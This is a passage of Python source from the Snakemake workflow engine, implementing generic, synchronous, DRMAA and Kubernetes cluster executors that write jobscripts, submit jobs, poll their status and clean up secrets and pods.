self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
scheduler_solver_path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
scheduler_solver_path = "--scheduler-solver-path {}".format(
os.path.dirname(sys.executable)
)
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
fd.write("\n".join(wait_for_files))
waitfiles_parameter = format(
"--wait-for-files-file {wait_for_files_file}",
wait_for_files_file=repr(wait_for_files_file),
)
else:
waitfiles_parameter = format(
"--wait-for-files {wait_for_files}",
wait_for_files=[repr(f) for f in wait_for_files],
)
job_specific_args = ""
if job.is_group:
job_specific_args = f"--local-groupid {job.jobid}"
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
waitfiles_parameter=waitfiles_parameter,
scheduler_solver_path=scheduler_solver_path,
job_specific_args=job_specific_args,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cancelcmd=None,
cancelnargs=None,
sidecarcmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.cancelcmd = cancelcmd
self.sidecarcmd = sidecarcmd
self.cancelnargs = cancelnargs
self.external_jobid = dict()
# We need to collect all external ids so we can properly cancel even if
# the status update queue is running.
self.all_ext_jobids = list()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.sidecar_vars = None
if self.sidecarcmd:
self._launch_sidecar()
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def _launch_sidecar(self):
        def copy_stdout(executor, process):
            """Run sidecar process and copy its stdout to our stdout."""
while process.poll() is None and executor.wait:
buf = process.stdout.readline()
if buf:
self.stdout.write(buf)
# one final time ...
buf = process.stdout.readline()
if buf:
self.stdout.write(buf)
def wait(executor, process):
while executor.wait:
time.sleep(0.5)
process.terminate()
process.wait()
logger.info(
"Cluster sidecar process has terminated (retcode=%d)."
% process.returncode
)
logger.info("Launch sidecar process and read first output line.")
process = subprocess.Popen(
self.sidecarcmd, stdout=subprocess.PIPE, shell=False, encoding="utf-8"
)
self.sidecar_vars = process.stdout.readline()
while self.sidecar_vars and self.sidecar_vars[-1] in "\n\r":
self.sidecar_vars = self.sidecar_vars[:-1]
logger.info("Done reading first output line.")
thread_stdout = threading.Thread(
target=copy_stdout, name="sidecar_stdout", args=(self, process)
)
thread_stdout.start()
thread_wait = threading.Thread(
target=wait, name="sidecar_stdout", args=(self, process)
)
thread_wait.start()
def cancel(self):
def _chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
if self.cancelcmd: # We have --cluster-cancel
# Enumerate job IDs and create chunks. If cancelnargs evaluates to false (0/None)
# then pass all job ids at once
jobids = list(self.all_ext_jobids)
chunks = list(_chunks(jobids, self.cancelnargs or len(jobids)))
# Go through the chunks and cancel the jobs, warn in case of failures.
failures = 0
for chunk in chunks:
try:
cancel_timeout = 2 # rather fail on timeout than miss canceling all
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
subprocess.check_call(
[self.cancelcmd] + chunk,
shell=False,
timeout=cancel_timeout,
env=env,
)
except subprocess.SubprocessError:
failures += 1
if failures:
logger.info(
(
"{} out of {} calls to --cluster-cancel failed. This is safe to "
"ignore in most cases."
).format(failures, len(chunks))
)
else:
logger.info(
"No --cluster-cancel given. Will exit after finishing currently running jobs."
)
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
# Remove SNAKEMAKE_PROFILE from environment as the snakemake call inside
            # of the cluster job must run locally (otherwise it complains about a missing -j).
env.pop("SNAKEMAKE_PROFILE", None)
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
env=env,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = []
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
ret = subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
env=env,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.append(-e.returncode)
if len(status_cmd_kills) > 10:
                            logger.info(
                                "Cluster status command {} was killed >10 times with signal(s) {} "
                                "(if this happens unexpectedly during your workflow execution, "
                                "have a closer look).".format(
                                    self.statuscmd, ",".join(map(str, status_cmd_kills))
)
)
status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
    Cluster invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
    synchronous, blocking the foreground thread and returning the
    remote exit code once the remote job exits.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
suspended_msg = set()
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.jobStatus(active_job.jobid)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
if retval == drmaa.JobState.DONE:
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
elif retval == drmaa.JobState.FAILED:
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
# still running
still_running.append(active_job)
def handle_suspended(by):
if active_job.job.jobid not in suspended_msg:
logger.warning(
"Job {} (DRMAA id: {}) was suspended by {}.".format(
active_job.job.jobid, active_job.jobid, by
)
)
suspended_msg.add(active_job.job.jobid)
if retval == drmaa.JobState.USER_SUSPENDED:
handle_suspended("user")
elif retval == drmaa.JobState.SYSTEM_SUSPENDED:
handle_suspended("system")
else:
try:
suspended_msg.remove(active_job.job.jobid)
except KeyError:
# there was nothing to remove
pass
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
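# A minimal usage sketch (added for illustration; the helper is hypothetical):
# change_working_directory switches into the given directory for the duration
# of the block and restores the previous working directory afterwards; with no
# argument it simply yields without changing anything.
def _change_working_directory_example(shadow_dir=None):
    """Illustrative only: report the cwd outside and inside the context."""
    before = os.getcwd()
    with change_working_directory(shadow_dir):
        inside = os.getcwd()
    return before, inside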
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Kubernetes jobs.")
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
                # Some files are smaller than 1MB but grow larger after being base64-encoded.
                # We should exclude them as well, otherwise the Kubernetes API will complain.
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
            logger.warning(
                "The following are the largest files. Consider removing some of them "
                "(you need to remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
    # In rare cases, deleting a pod may raise a 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
                logger.warning(
                    "[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
                    "[WARNING] Ignoring this error.\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
        # mount both the workdir volume and the source secret volume
        container.volume_mounts = [
            kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir"),
            kubernetes.client.V1VolumeMount(name="source", mount_path="/source"),
        ]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
            # Running in privileged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error doesn't mean anything wrong with the k8s cluster, and users can safely
# ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
                logger.info(
                    "Request timed out! "
                    "Check your connection to the Kubernetes master. "
                    "The workflow will pause for 5 minutes to allow any update operations to complete."
                )
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
                    raise WorkflowError(
                        e,
                        "Error 111 connection timeout, please check"
                        " that the k8s cluster master is reachable!",
                    )
def _wait_for_jobs(self):
import kubernetes
while True:
